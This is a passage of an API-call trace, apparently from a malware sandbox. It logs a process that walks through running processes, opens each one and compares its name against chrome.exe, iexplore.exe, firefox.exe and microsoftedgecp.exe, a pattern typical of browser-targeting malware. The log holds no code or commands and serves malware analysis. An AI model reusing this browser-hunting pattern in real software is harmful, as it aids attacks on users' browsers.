	[0205.280] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.281] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2b8c
	[0205.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.281] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.281] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.282] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.282] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.282] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0205.283] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2b90
	[0205.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.283] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0205.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.283] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.284] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0205.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.284] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.284] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.285] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2b94
	[0205.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.285] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.285] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.286] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.286] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.286] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0205.287] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2b98
	[0205.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.287] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.287] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.288] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.288] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.288] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0205.289] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2b9c
	[0205.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.289] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0205.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.289] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.290] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0205.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.290] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.290] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.291] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2ba0
	[0205.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.291] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.291] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.291] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.292] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.292] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0205.293] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2ba4
	[0205.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.293] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0205.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.293] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.293] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0205.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.294] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.294] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0205.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2ba8
	[0205.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.295] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0205.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.295] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.295] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0205.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.296] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.296] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0205.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2bac
	[0205.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.300] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0205.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.300] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.300] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0205.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.301] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.301] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0205.301] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2bb0
	[0205.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.301] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0205.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.302] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.302] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0205.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.302] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.303] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0205.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0205.303] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0205.304] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2bb4
	[0205.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.304] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0205.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.305] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.305] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0205.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.306] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.307] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0205.308] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2bb8
	[0205.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.308] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0205.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.308] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.308] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0205.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.309] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.309] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0205.309] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2bbc
	[0205.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.310] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0205.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.310] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.310] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0205.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.310] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.311] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0205.311] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2bc0
	[0205.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.311] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0205.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.312] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.312] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0205.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.313] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.313] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0205.314] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2bc4
	[0205.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.314] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0205.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.314] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.315] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0205.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.315] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.316] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0205.316] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2bc8
	[0205.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.316] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0205.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.317] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.317] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0205.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.317] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.317] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0205.318] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2bcc
	[0205.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.318] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0205.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.319] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.319] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0205.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.319] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.320] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0205.320] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2bd0
	[0205.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.321] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0205.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.321] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.322] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0205.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.322] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.322] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0205.323] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2bd4
	[0205.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.323] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0205.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.323] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.324] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0205.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.324] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.324] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0205.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2bd8
	[0205.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.325] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0205.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.325] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.325] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0205.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.326] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.326] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0205.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2bdc
	[0205.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.327] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0205.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.327] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.327] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0205.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.328] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.328] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0205.329] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x2be0
	[0205.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.329] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0205.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.330] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.330] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0205.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.331] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.331] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0205.332] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2be4
	[0205.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.332] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0205.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.333] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.333] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0205.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.334] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.334] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0205.335] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2be8
	[0205.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.335] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0205.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.335] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.336] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0205.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.337] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.337] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
